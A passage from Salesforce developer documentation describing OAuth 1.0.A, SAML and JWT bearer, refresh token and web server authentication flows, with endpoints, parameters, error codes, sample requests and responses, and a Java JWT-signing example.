• OAuth 1.0.A—This version of OAuth has only one flow.

• OAuth 2.0 Web server—The Web server authentication flow is used by applications that are hosted on a secure server. A
critical aspect of the Web server flow is that the server must be able to protect the consumer secret.

• OAuth 2.0 user-agent—The user-agent authentication flow is used by client applications (consumers) residing in the user's
device. This could be implemented in a browser using a scripting language such as JavaScript, or from a mobile device or
a desktop application. These consumers cannot keep the client secret confidential.

• OAuth 2.0 refresh token flow—After the consumer has been authorized for access, they can use a refresh token to get a
new access token (session ID.) This is only done after the consumer already has received a refresh token using either the
Web server or user-agent flow.

• OAuth 2.0 JWT Bearer Token Flow—The OAuth 2.0 JWT bearer token flow defines how a JWT can be used to request
an OAuth access token from Salesforce when a client wishes to utilize a previous authorization. Authentication of the
authorized application is provided by a digital signature applied to the JWT.

• OAuth 2.0 SAML Bearer Assertion Flow—The OAuth 2.0 SAML bearer assertion flow defines how a SAML assertion
can be used to request an OAuth access token when a client wishes to utilize a previous authorization. Authentication of
the authorized application is provided by the digital signature applied to the SAML assertion.
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• SAML assertion flow—The SAML assertion flow is an alternative for organizations that are currently using SAML to
access Salesforce, and want to access the Web services API the same way. The SAML assertion flow can only be used
inside a single organization. You do not have to create a remote access application to use this assertion flow.

• OAuth 2.0 username and password—The username-password authentication flow can be used to authenticate when the
consumer already has the user’s credentials.

Warning:  This OAuth authentication flow involves passing the user’s credentials back and forth. Use this
authentication flow only when necessary. No refresh token will be issued.

For all authentication flows, if a user is asked to authorize access and instead clicks the link indicating they are not the currently
signed in user, the current user is logged out and the authorization flow restarts with authenticating the user.

OAuth 2.0 Endpoints

The three primary endpoints used with OAuth 2.0 are:

• Authorization—https://login.salesforce.com/services/oauth2/authorize

• Token—https://login.salesforce.com/services/oauth2/token

• Revoke—https://login.salesforce.com/services/oauth2/revoke

See Revoking OAuth Tokens on page 3676 for details on revoking access.

For a Sandbox, use test.salesforce.com instead of login.salesforce.com.

OAuth 1.0.A Authentication Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The following diagram displays the authentication flow steps for OAuth 1.0.A. The individual step descriptions follow. OAuth
1.0.A has a single authentication flow.
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1. The consumer requests a RequestToken. Salesforce verifies the request and returns a request token.
2. The consumer should redirect the user to Salesforce, where they are prompted to log in.
3. Salesforce authorizes the user.
4. Once the user is authorized, the consumer requests an AccessToken.
5. Salesforce verifies the request and grants the token.
6. After the token is granted, the consumer accesses the data either through their application or through the Force.com Web

services API.
7. Salesforce verifies the request and allows access to the data.

The following sections go into more details about each of these steps.
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Tip: To use a remote access application with a Sandbox, use test.salesforce.com instead of
login.salesforce.com in the following sections.

For the list of possible error codes returned by Salesforce, see OAuth 1.0.A Error Codes on page 3688.

Requesting a RequestToken

When a consumer makes an initial request to Salesforce, a RequestToken is returned if the request is valid. The following
steps contain more detail for the developer who is using a remote access application to request Salesforce data.

1. A consumer application needs to access Salesforce data and sends a request to
https://login.salesforce.com/_nc_external/system/security/oauth/RequestTokenHandler. The
request contains the following:

• A valid request for a RequestToken, which contains the following OAuth parameters.

◊ oauth_consumer_key

◊ oauth_signature_method—must be HMAC-SHA1.
◊ oauth_signature

◊ oauth_timestamp

◊ oauth_nonce

◊ oauth_version—optional, must be “1.0” if included
◊ oauth_callback—must be one of the following:

- URL hosted by the consumer, for example,
https://www.appirio.com/sfdc_accounts/access_token_ready.html. Note that this URL uses
https or another protocol. It cannot use http.

- oob, meaning out of band.

• A signature on page 3687 created according to the OAuth specification for HMAC-SHA1.

2. After Salesforce receives the request, Salesforce:

• Validates the request with its own copy of the consumer secret
• Generates a response containing RequestToken and RequestTokenSecret in the HTTP body as name/value pairs
• Sends the response back to the consumer

A RequestToken is only valid for 15 minutes, plus three minutes to allow for differences between machine clocks.

3. The consumer directs the user to a Salesforce login page, as specified in the next section.

Authorizing the User

After the request from the consumer is made to Salesforce, the user must be authenticated by Salesforce before the process
continues. The following contains more detailed steps about the login procedure for developers who are using a remote access
application to request Salesforce data.

1. The consumer redirects the user to the following location, where they are prompted to log in:
https://login.salesforce.com/setup/secur/RemoteAccessAuthorizationPage.apexp. The appropriate
GET query parameters are appended to this URL.

• oauth_token – the RequestToken
• oauth_consumer_key
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Note:  If an oauth_callback parameter is included, it is ignored.

2. The Remote Access Authorization page displays.
3. If the user approves access for the consumer, Salesforce generates the AccessToken and AccessTokenSecret.

Note:  The number of concurrent access tokens that can be granted by a user to an application is limited. The
default is five per application per user. If this authorization exceeds the limit for the organization, the user is
notified that their authorization automatically revokes the token or tokens for this application that haven't been
used for the longest period of time.

4. Salesforce verifies the callback URL (either specified in the remote access application definition pages or in the
oauth_callback parameter from the previous stage). One of the following redirections occurs.

• If the oauth_callback defined in the RequestToken is oob and the Callback URL field in the remote access
application definition page has a valid value, the user is redirected to that URL.

• If the oauth_callback defined in the RequestToken is a valid URL, the user is redirected to that URL.

5. The consumer is notified that the AccessToken and AccessTokenSecret are available either by receiving the verification
token from Salesforce or the validation code from the end user.

Requesting the AccessToken

Once the user has been authenticated, the consumer can exchange a RequestToken for an AccessToken. The following contains
more detailed steps regarding the exchange of tokens for developers who are using a remote access application to request
Salesforce data.

1. The consumer makes an HTTPS GET or POST request to
https://login.salesforce.com/_nc_external/system/security/oauth/AccessTokenHandler, with
the required parameters in the query or post data.

• oauth_consumer_key

• oauth_signature_method

• oauth_signature

• oauth_timestamp

• oauth_token

• oauth_nonce

• oauth_verifier

• oauth_version—optional, must be “1.0” if included

2. Salesforce validates the following elements.

• The consumer secret
• The consumer key
• The signature
• That the RequestToken has never been used before
• The timestamp (must be within 15 minutes, plus three minutes to allow for differences between machine clocks)
• That the nonce has never used before

3. Upon validation, Salesforce returns the AccessToken and AccessTokenSecret in the HTTP response body as name/value
pairs.
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Generating oauth_signature for Login

You can access Salesforce using either the user interface, or using the API. The oauth_signature used for login is generated
differently, depending on which method you use.

• User interface—use https://login.salesforce.com for generating the signature
• API—use https://login.salesforce.com/services/OAuth/type/api-version for generating the signature.

type must have one of the following values.

◊ u—Partner WSDL
◊ c—Enterprise WSDL

For example, https://login.salesforce.com/services/OAuth/u/17.0.

Accessing Salesforce Data Using the Consumer Application

Once the consumer possesses a valid AccessToken, a remote access application can request to access Salesforce data. The
following contains more detailed steps regarding accessing data for developers who are using a remote access application to
request Salesforce data.

1. The consumer makes an HTTPS POST request to https://login.salesforce.com, with the required parameters
in the authorization header.

• oauth_consumer_key

• oauth_token

• oauth_signature_method

• oauth_signature

• oauth_timestamp

• oauth_nonce

• oauth_version (optional, must be “1.0” if included)

2. Salesforce validates the request and sends a valid session ID to the consumer.

Accessing Salesforce Data Using the API

Once the consumer possesses a valid AccessToken, a remote access application can request to access Salesforce data using the
Force.com Web services API.

Note:  Your organization must have access to both the API and to the remote access application. Contact your
salesforce.com representative for more information.

The following contains more detailed steps regarding accessing data for developers who are using a remote access application
to request Salesforce data.

1. The consumer makes an HTTPS POST request to Salesforce.

• The URL must have the following format:
https://login.salesforce.com/services/OAuth/type/api-version.

type must have one of the following values.

◊ u—Partner WSDL
◊ c—Enterprise WSDL

api-version must be a valid API version.

• The authorization header must have the following parameters.
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◊ oauth_consumer_key

◊ oauth_token

◊ oauth_signature_method

◊ oauth_signature

◊ oauth_timestamp

◊ oauth_nonce

◊ oauth_version (optional, must be “1.0” if included)

2. Salesforce validates the request and sends a valid session ID to the consumer. The response header includes the following.

<response>
<metadataServerUrl>https://na1.salesforce.com/services/Soap/m/17.0/00D300000006qjK
</metadataServerUrl>
<sandbox>false</sandbox>
<serverUrl>https://na1.salesforce.com/services/Soap/u/17.0/00D300000006qjK
</serverUrl>
<sessionId>00D300000006qrN!AQoAQJTMzwTa67tGgQck1ng_xgMSuWVBpFwZ1xUq2kLjMYg6Zq

GTS8Ezu_C3w0pdT1DMyHiJgB6fbhhEPxKjGqlYnlROIUs1</sessionId>
</response>

See Also:
Authenticating Remote Access Application OAuth

OAuth 1.0.A Error Codes
Salesforce returns the following error codes during the OAuth 1.0.A Authentication Flow. The returned error code is based
on the error received.

NotesErrorFault Code

A Nonce can only be used once.Failed: Nonce Replay Detected1701

Failed: Missing Consumer Key Parameter1702

Failed: Invalid Access Token1703

You must specify 1.0 for the oauth_version
parameter.

Failed: Version Not Supported1704

The timestamp is one of the following: missing, in the
future, too old, or malformed.

Failed: Invalid Timestamp1705

The Nonce is missing.Failed: Invalid Nonce1706

Failed: Missing OAuth Token Parameter1707

Failed: IP Address Not Allowed1708

The RequestToken contains an invalid
oauth_signature_method parameter.

Failed: Invalid Signature Method1709
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NotesErrorFault Code

The RequestToken contains an invalid
oauth_callback parameter. Value must be either
oob or a valid URL that uses https.

Failed: Invalid Callback URL1710

The AccessToken. contains an invalid
oauth_verifier parameter.

Failed: Invalid Verifier1711

Can only attempt to exchange a RequestToken for an
AccessToken three times.

Failed: Get Access Token Limit Exceeded1712

The remote access application has been deleted from
the Salesforce organization.

Failed: Consumer Deleted1713

Either the Force.com Web services API is not enabled
for the organization, or OAuth API access has been
disabled for the organization.

Failed: OAuth Api Access Disabled1716

OAuth 2.0 SAML Bearer Assertion Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

A SAML assertion is an XML security token, generally issued by an identity provider and consumed by a service provider
who relies on its content to identify the assertion’s subject for security-related purposes.

The OAuth 2.0 SAML bearer assertion flow defines how a SAML assertion can be used to request an OAuth access token
when a client wishes to utilize a previous authorization. Authentication of the authorized application is provided by the digital
signature applied to the SAML assertion.

A more detailed explanation can be found here: http://tools.ietf.org/html/draft-ietf-oauth-saml2-bearer.

Overview of OAuth 2.0 SAML Bearer Assertion Flow

The OAuth 2.0 SAML bearer assertion flow is similar to a refresh token flow within OAuth. The SAML assertion is POSTed
to the OAuth token endpoint, which in turn processes the assertion, and issues an access_token based upon prior approval
of the application. However, the client doesn’t need to have or store a refresh_token, nor is a client_secret required
to be passed to the token endpoint.

The following are the general steps involved in using the OAuth 2.0 SAML bearer assertion flow:

1. The developer creates a remote access application and registers an X509 Certificate. This certificate corresponds to the
private key of their application. When the remote access application is saved, the Consumer Key (OAuth client_id)
is generated and assigned to the application.

2. The developer writes an application that generates a SAML assertion, and signs it with their private key.
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3. The assertion is POSTed to the token endpoint https://login.salesforce.com/services/oauth2/token.
4. The token endpoint validates the signature using the certificate registered by the developer.
5. The token endpoint validates the Audience, Issuer, Subject, and validity of the assertion.
6. Assuming the assertion is valid and the application has been previously authorized by the user or administrator, Salesforce

issues an access_token.

Note:  A refresh_token is never issued in this flow.

Creating a SAML Bearer Assertion

The developer must create a valid SAML bearer assertion that conforms to the following rules:

• The Issuer must be the OAuth client_id or the remote access application for which the developer registered their
certificate.

• The Audience must be https://login.salesforce.com or https://test.salesforce.com.
• The Recipient must be https://login.salesforce.com/services/oauth2/token or

https://test.salesforce.com/services/oauth2/token.
• The Subject NameID must be the username of the desired Salesforce user.
• The SAML assertion must conform with the general format rules specified here:

http://tools.ietf.org/html/draft-ietf-oauth-saml2-bearer.
• When POSTed to the token endpoint, the assertion must be encoded using base64url encoding as defined here:

http://tools.ietf.org/html/rfc4648#page-7

The following is a sample assertion:

<?xml version="1.0"?>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"

ID="C625490D-C2B9-15BE-6DFA-7286288D9655" IssueInstant="2012-04-04T06:54:14Z" Version="2.0">

<saml:Issuer>3MVG9PhR6g6B7ps45QoRvhVGGMmR_DT4kxXzVXOo6TTHF3QO1nmqOAstC92
4qSUiUeEDcuGV4tmAxyo_fV8j</saml:Issuer>

<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<ds:Reference URI="#C625490D-C2B9-15BE-6DFA-7286288D9655">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>

<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
<ds:DigestValue>f187DeCiwFhhH2etlU+5byskey4=</ds:DigestValue>

</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>iBoeMUxG4v/NAC+i74/UnHDcX45YeMXh09e2hik/T5dIqtUZt9dg1

Yp9mP4P3YIsuQ1KhyHRFKlOfUiYNSpv1qH6R7tYgpHMKE9VVc7foLE8Pv0N1VJPoCeh+qYTRv0Itvq
jmZVgFzp5gN41OJRnztp1Y9OxFE0RgWxHaTasI6LMI/3xVH+fd/ccfUcu876repVQlf9KQROg1dN1M
NzBsk2f0RDZao2+k2UXMwP9KWoW9E/xiwjlhFq14leHeWYhIhGy1rLTqQiIc7k/T54THyRnpClDkRv
GWogx7ihiMZ7+fLwwgbfRtrDOS0JZOM4L34YWa/cb9hpVvqvRBPtsng==</ds:SignatureValue>

</ds:Signature>
<saml:Subject>
<saml:NameID

Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">Pierre_Delacroix@SeattleApps.com

</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
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<saml:SubjectConfirmationData
Recipient="https://login.salesforce.com/services/oauth2/token"
NotOnOrAfter="2012-04-04T07:04:14Z"/>

</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2012-04-04T06:54:14Z" NotOnOrAfter="2012-04-04T07:04:14Z">
<saml:AudienceRestriction>
<saml:Audience>https://login.salesforce.com/services/oauth2/token</saml:Audience>

</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2012-04-04T06:54:14Z"

SessionIndex="ED868FE5-841D-5192-766C-941A60D6602F">
<saml:AuthnContext>

<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>

</saml:AuthnContext>
</saml:AuthnStatement>

</saml:Assertion>

Using SAML Bearer Assertions

SAML bearer assertions should be POSTed to the token endpoint at
https://login.salesforce.com/services/oauth2/token or
https://test.salesforce.com/services/oauth2/token.

When POSTed, the following parameters must be provided:

• grant_type: urn:ietf:params:oauth:grant-type:saml2-bearer — Required.
• assertion: The SAML bearer assertion, encoded using base64url as defined here:

http://tools.ietf.org/html/rfc4648#page-7— Required.

Additional standard parameters:

• format: Format of the response may be specified as in an OAuth flow, using the token parameter, or an HTTP Accepts
header.

• scope: Scope is not supported in the flow. The value for this parameter is the combination of scopes from previous
approvals.

Here is a sample token request:

POST /services/oauth2/token HTTP/1.1
Host: login.salesforce.com
Content-Type: application/x-www-form-urlencoded

grant_type=
urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Asaml2-bearer&assertion=PHNhbWxwOl...[omitted for
brevity]...ZT

Server Sends a Response

After the request is verified, Salesforce sends a response to the client. Token responses for the OAuth 2.0 SAML bearer token
flow follow the same format as authorization_code flows, although no refresh_token is ever issued.

Note:  A SAML OAuth 2.0 bearer assertion request looks at all the previous approvals for the user that include a
refresh_token. If matching approvals are found, the values of the approved scopes are combined and an
access_token is issued. If no previous approvals included a refresh_token, no approved scopes are available,
and the request fails as unauthorized.
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Errors

If there is an error in processing the SAML bearer assertion, the server replies with a standard OAuth error response, including
an error and an error description containing additional information regarding the reasons the token was considered invalid.
Here is a sample error response:

HTTP/1.1 400 Bad Request
Content-Type: application/json
Cache-Control: no-store
{
"error":"invalid_grant",
"error_description":"Audience validation failed"

}

See Also:
Authenticating Remote Access Application OAuth

OAuth 2.0 JWT Bearer Token Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

JSON Web Token (JWT) is a JSON-based security token encoding that enables identity and security information to be shared
across security domains.

The OAuth 2.0 JWT bearer token flow defines how a JWT can be used to request an OAuth access token from Salesforce
when a client wishes to utilize a previous authorization. Authentication of the authorized application is provided by a digital
signature applied to the JWT.

More detailed explanations of a JWT and the JWT bearer token flow for OAuth can be found at:

• http://tools.ietf.org/html/draft-jones-oauth-jwt-bearer

• http://tools.ietf.org/html/draft-jones-json-web-token

Overview of OAuth 2.0 JWT Bearer Token Flow

The OAuth 2.0 JWT bearer token flow is similar to a refresh token flow within OAuth. The JWT is POSTed to the OAuth
token endpoint, which in turn processes the JWT, and issues an access_token based upon prior approval of the application.
However, the client doesn’t need to have or store a refresh_token, nor is a client_secret required to be passed to the
token endpoint.

JWT bearer flow supports the RSA SHA256 algorithm, which uses an uploaded certificate as the signing secret.

The OAuth 2.0 JWT bearer token flow involves the following general steps:
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1. The developer creates a new or uses an existing remote access application and may optionally register an X509 Certificate.
This certificate corresponds to the private key of their application. When the remote access application is saved, the
Consumer Key (OAuth client_id) and Consumer Secret are generated and assigned to the application.

2. The developer writes an application that generates a JWT, and signs it with their certificate.
3. The JWT is POSTed to the token endpoint https://login.salesforce.com/services/oauth2/token.
4. The token endpoint validates the signature using the certificate registered by the developer.
5. The token endpoint validates the audience (aud), issuer (iss), validity (exp), and principal (prn) of the JWT.
6. Assuming the JWT is valid and the application has been previously authorized by the user or administrator, Salesforce

issues an access_token.

Note:  A refresh_token is never issued in this flow.

Creating a JWT Bearer Token

The developer must create a valid JWT bearer token that conforms to RSA SHA256 according to the following rules.

• The issuer (iss) must be the OAuth client_id or the remote access application for which the developer registered their
certificate.

• The audience (aud) must be https://login.salesforce.com or https://test.salesforce.com.
• The principal (prn) must be the username of the desired Salesforce user.
• The validity (exp) must be the expiration time of the assertion, within five minutes, expressed as the number of seconds

from 1970-01-01T0:0:0Z measured in UTC.
• The JWT must be signed using RSA SHA256.
• The JWT must conform with the general format rules specified here:

http://tools.ietf.org/html/draft-jones-json-web-token.

To construct a JWT bearer token, do the following:

1. Construct a JWT Header in the following format: {"alg":"RS256"}.
2. Base64url encode the JWT Header as defined here: http://tools.ietf.org/html/rfc4648#page-7. The result

should be similar to this: eyJhbGciOiJSUzI1NiJ9.
3. Construct a JSON Claims Set for the JWT with the iss, prn, aud, and exp:

{"iss": "3MVG99OxTyEMCQ3gNp2PjkqeZKxnmAiG1xV4oHh9AKL_rSK.BoSVPGZHQ
ukXnVjzRgSuQqGn75NL7yfkQcyy7",
"prn": "Pierre_Delacroix@SeattleApps.com",
"aud": "https://login.salesforce.com",
"exp": "1333685628"}

4. Base64url encode the JWT Claims Set. For example:

eyJpc3MiOiAiM01WRzk5T3hUeUVNQ1EzZ05wMlBqa3FlWkt4bm1BaUcxeFY0b0hoO
UFLTF9yU0suQm9TVlBHWkhRdWtYblZqelJnU3VRcUduNzVOTDd5ZmtRY3l5NyIsIC
Jwcm4iOiAiY2hhcmxpZW1vcnRpbW9yZUBnbWFpbC5jb20iLCAiYXVkIjogImh0dHB
zOi8vbG9naW4uc2FsZXNmb3JjZS5jb20iLCAiZXhwIjogIjEzMzM2ODU2MjgifQ

5. Create a new string for the encoded JWT Header and the encoded JWT Claims Set, in this format:

encoded_JWT_Header + "." + encoded_JWT_Claims_Set
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In the following example, the encoded JWT Header is highlighted:

eyJhbGciOiJSUzI1NiJ9.eyJpc3MiOiAiM01WRzk5T3hUeUVNQ1EzZ05wMlBqa
3FlWkt4bm1BaUcxeFY0b0hoOUFLTF9yU0suQm9TVlBHWkhRdWtYblZqelJnU3V
RcUduNzVOTDd5ZmtRY3l5NyIsICJwcm4iOiAiY2hhcmxpZW1vcnRpbW9yZUBnb
WFpbC5jb20iLCAiYXVkIjogImh0dHBzOi8vbG9naW4uc2FsZXNmb3JjZS5jb20
iLCAiZXhwIjogIjEzMzM2ODU2MjgifQ

6. Sign the resulting string using SHA256 with RSA.
7. Create a new string of the string from this step, in the following format:

existing_string + "." + base64_encoded_signature

In the following example, the start of the base64 encoded signature is highlighted:

eyJhbGciOiJSUzI1NiJ9.eyJpc3MiOiAiM01WRzk5T3hUeUVNQ1EzZ05wMlBqa3FlWkt4
bm1BaUcxeFY0b0hoOUFLTF9yU0suQm9TVlBHWkhRdWtYblZqelJnU3VRcUduNzVOTDd5Z
mtRY3l5NyIsICJwcm4iOiAiY2hhcmxpZW1vcnRpbW9yZUBnbWFpbC5jb20iLCAiYXVkIj
ogImh0dHBzOi8vbG9naW4uc2FsZXNmb3JjZS5jb20iLCAiZXhwIjogIjEzMzM2ODU2Mjg
ifQ.iYCthqWCQucwi35yFs-nWNgpF5NA_a46fXDTNIY8ACko6BaEtQ9E6h4Hn1l_pcwcK
I_GlmfUO2dJDg1A610t09TeoPagJsZDm_H83bsoZUoI8LpAA1s-2aj_Wbysqb1j4uDToz
480WtEbkwIv09sIeS_-QuWak2RXOl1Krnf72mpVGS4WWSULodgNzlKHHyjAMAHiBHIDNt
36y2L2Bh7M8TNWiKa_BNM6s1FNKDAwHEWQrNtAeReXgRy0MZgQY2rZtqT2FcDyjY3JVQb
En_CSjH2WV7ZlUwsKHqGfI7hzeEvVdfOjH9NuaJozxvhPF489IgW6cntPuT2V647JWi7ng

The follow Java code is a simple example of constructing a JWT bearer token:

import org.apache.commons.codec.binary.Base64;
import java.io.*;
import java.security.*;
import java.text.MessageFormat;

public class JWTExample {

public static void main(String[] args) {

String header = "{\"alg\":\"RS256\"}";
String claimTemplate = "'{'\"iss\": \"{0}\", \"prn\": \"{1}\", \"aud\": \"{2}\", \"exp\":

\"{3}\"'}'";

try {
StringBuffer token = new StringBuffer();

//Encode the JWT Header and add it to our string to sign
token.append(Base64.encodeBase64URLSafeString(header.getBytes("UTF-8")));

//Separate with a period
token.append(".");

//Create the JWT Claims Object
String[] claimArray = new String[4];
claimArray[0] =

"3MVG99OxTyEMCQ3gNp2PjkqeZKxnmAiG1xV4oHh9AKL_rSK.BoSVPGZHQukXnVjzRgSuQqGn75NL7yfkQcyy7";
claimArray[1] = "Pierre_Delacroix@SeattleApps.com";
claimArray[2] = "https://login.salesforce.com";
claimArray[3] = Long.toString( ( System.currentTimeMillis()/1000 ) + 300);
MessageFormat claims;
claims = new MessageFormat(claimTemplate);
String payload = claims.format(claimArray);

//Add the encoded claims object
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token.append(Base64.encodeBase64URLSafeString(payload.getBytes("UTF-8")));

//Load the private key from a keystore
KeyStore keystore = KeyStore.getInstance("JKS");
keystore.load(new FileInputStream("./path/to/keystore.jks"),

"keystorepassword".toCharArray());
PrivateKey privateKey = (PrivateKey) keystore.getKey("certalias",

"privatekeypassword".toCharArray());

//Sign the JWT Header + "." + JWT Claims Object
Signature signature = Signature.getInstance("SHA256withRSA");
signature.initSign(privateKey);
signature.update(token.toString().getBytes("UTF-8"));
String signedPayload = Base64.encodeBase64URLSafeString(signature.sign());

//Separate with a period
token.append(".");

//Add the encoded signature
token.append(signedPayload);

System.out.println(token.toString());

} catch (Exception e) {
e.printStackTrace();

}
}

}

Using a JWT Bearer Token

JWT bearer tokens should be POSTed to the token endpoint at
https://login.salesforce.com/services/oauth2/token or
https://test.salesforce.com/services/oauth2/token.

When POSTed, the following parameters are required:

• grant_type: urn:ietf:params:oauth:grant-type:jwt-bearer.
• assertion: The JWT bearer token, base64url-encoded.

Additional standard parameters:

• format: Format of the response may be specified as in an OAuth flow, using the token parameter, or an HTTP Accepts
header.

• scope: Scope is not supported in the flow. The value for this parameter is the combination of scopes from previous
approvals.

Here is a sample token request:

POST /services/oauth2/token HTTP/1.1
Host: login.example.com
Content-Type: application/x-www-form-urlencoded

grant_type=
urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion=PHNhbWxwOl...[omitted for
brevity]...ZT

Server Validates the Token

After the request is verified, Salesforce sends a response to the client. Token responses for the OAuth 2.0 JWT bearer token
flow follow the same format as authorization_code flows, although no refresh_token is ever issued. A JWT OAuth
2.0 bearer assertion request looks at all the previous approvals for the user that include a refresh_token. If matching
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approvals are found, the values of the approved scopes are combined and an access_token is issued. If no previous approvals
included a refresh_token, no approved scopes are available, and the request fails as unauthorized.

Errors

If there is an error in processing the JWT bearer token, the server replies with a standard OAuth error response, including an
error and an error description containing additional information regarding the reasons the token was considered invalid. Here
is a sample error response:

HTTP/1.1 400 Bad Request
Content-Type: application/json
Cache-Control: no-store
{
"error":"invalid_grant",
"error_description":"Audience validation failed"

}

See Also:
Authenticating Remote Access Application OAuth

OAuth 2.0 Refresh Token Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

After the consumer has been authorized for access, they can use a refresh token to get a new access token (session ID.) This
is only done after the consumer already has received a refresh token using either the Web server or user-agent flow. It is up
to the consumer to determine when an access token is no longer valid, and when to apply for a new one. Bearer flows can only
be used after the consumer has received a refresh token.

The following are the steps for the refresh token authentication flow. More detail about each step follows:

1. The consumer uses the existing refresh token to request a new access token.
2. After the request is verified, Salesforce sends a response to the client.

Consumer Requests Updated Access Token

A consumer can use the refresh token to get a new session as needed.

The consumer should make POST request to the token endpoint, with the following parameters:

• grant_type—Value must be refresh_token for this flow.
• refresh_token—Refresh token from the approval step.
• client_id—Consumer key from the remote access application definition.
• client_secret—Consumer secret from the remote access application definition. This parameter is optional.
• format—Expected return format. This parameter is optional. The default is json. Values are:
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◊ urlencoded

◊ json

◊ xml

The following example is the out-of-band POST body to the token endpoint:

POST /services/oauth2/token HTTP/1.1
Host: https://login.salesforce.com/
grant_type=refresh_token&client_id=3MVG9lKcPoNINVBIPJjdw1J9LLM82HnFVVX19KY1uA5mu0
QqEWhqKpoW3svG3XHrXDiCQjK1mdgAvhCscA9GE&client_secret=1955279925675241571
&refresh_token=your token here

Instead of using the format parameter, the client can also specify the returned format in an accept-request header using one
of the following:

• Accept: application/json

• Accept: application/xml

• Accept: application/x-www-form-urlencoded

Salesforce Server Sends a Response

After the request is verified, Salesforce sends a response to the client. The following parameters are in the body of the response:

• access_token—Salesforce session ID that can be used with the Web services API.
• instance_url—URL indicating the instance of the user’s organization. In this example, the instance is na1:

https://na1.salesforce.com.
• id—Identity URL that can be used to both identify the user as well as query for more information about the user. See

Using Identity URLs on page 3678.
• signature—Base64-encoded HMAC-SHA256 signature signed with the consumer’s private key containing the

concatenated ID and issued_at. This can be used to verify the identity URL was not modified since it was sent by the
server.

• issued_at—When the signature was created.

The following is a JSON example response from Salesforce:

{ "id":"https://login.salesforce.com/id/00Dx0000000BV7z/005x00000012Q9P",
"issued_at":"1278448384422","instance_url":"https://na1.salesforce.com",
"signature":"SSSbLO/gBhmmyNUvN18ODBDFYHzakxOMgqYtu+hDPsc=",
"access_token":"00Dx0000000BV7z!AR8AQP0jITN80ESEsj5EbaZTFG0RNBaT1cyWk7T
rqoDjoNIWQ2ME_sTZzBjfmOE6zMHq6y8PIW4eWze9JksNEkWUl.Cju7m4"}

The following is an XML example response:

<Oauth>
<access_token>00Dx0000000BV7z!AR8AQP0jITN80ESEsj5EbaZTFG0RNB

aT1cyWk7TrqoDjoNIWQ2ME_sTZzBjfmOE6zMHq6y8PIW4eWze9JksNEkWUl.Cju7m4
</access_token>
<instance_url>https://na1.salesforce.com</instance_url>
<id>https://login.salesforce.com/id/00Dx0000000BV7z/005x00000012Q9P</id>
<issued_at>1278448101416</issued_at>
<signature>CMJ4l+CCaPQiKjoOEwEig9H4wqhpuLSk4J2urAe+fVg=</signature>

</Oauth>

3697

OAuth 2.0 Refresh Token FlowCode



The following is an URL encoded example:

access_token=00Dx0000000BV7z!AR8AQP0jITN80ESEsj5EbaZTFG0RNBaT1cyWk7TrqoDjoNIWQ2
ME_sTZzBjfmOE6zMHq6y8PIW4eWze9JksNEkWUl.Cju7m4
&instance_url=https%3A%2F%2Fna1.salesforce.com
&id=https%3A%2F%2Flogin.salesforce.com%2Fid%2F00Dx0000000BV7z%2F005x00000012Q9P
&issued_at=1278448101416
&signature=CMJ4l%2BCCaPQiKjoOEwEig9H4wqhpuLSk4J2urAe%2BfVg%3D

If a problem occurs during this step, the response contains an error message with these parts:

• error—Error code
• error_description—Description of the error with additional information.

◊ unsupported_response_type—response type not supported
◊ invalid_client_id—client identifier invalid
◊ invalid_request—HTTPS required
◊ invalid_request—must use HTTP POST
◊ invalid_client_credentials—client secret invalid
◊ invalid_request—secret type not supported
◊ invalid_grant—expired access/refresh token
◊ invalid_grant—IP restricted or invalid login hours
◊ inactive_user—user is inactive
◊ inactive_org—organization is locked, closed, or suspended
◊ rate_limit_exceeded—number of logins exceeded
◊ invalid_scope—requested scope is invalid, unknown, or malformed

Any login error not listed receives a generic authentication failure with text describing the error. For example,
LOGIN_ERROR_INVALID_PASSWORD would have the following error response:

{"error":"authentication_failure","error_description":"invalid password"}

The following is an example of an error response:

{"error":"invalid_client_credentials","error_description":"client secret invalid"}

See Also:
Authenticating Remote Access Application OAuth
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OAuth 2.0 Web Server Authentication Flow
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The Web server authentication flow is used by applications that are hosted on a secure server. A critical aspect of the Web
server flow is that the server must be able to protect the consumer secret.

The following diagram displays the authentication flow steps for Web server clients. The individual step descriptions follow.

1. The Web server redirects the user to Salesforce to authenticate and authorize the server to access data on their behalf.
2. After the user approves access, the Web server receives a callback with an authorization code.
3. After obtaining the authorization code, the Web server passes back the authorization code to obtain a token response.
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4. After validating the authorization code, Salesforce passes back a token response. If there was no error, the token response
includes an access code and additional information.

5. After the token is granted, the Web server accesses their data.

After a Web server has an access token, they can use the access token to access Salesforce data on the end user’s behalf and
use a refresh token to get a new access token if it becomes invalid for any reason.

Redirect User to Obtain Access Authorization

To obtain authorization from the user to access Salesforce data on his or her behalf, the client redirects the user’s browser to
the authorization endpoint with the following parameters:

• response_type—Value must be code for this flow.
• client_id—Consumer key from the remote access application definition.
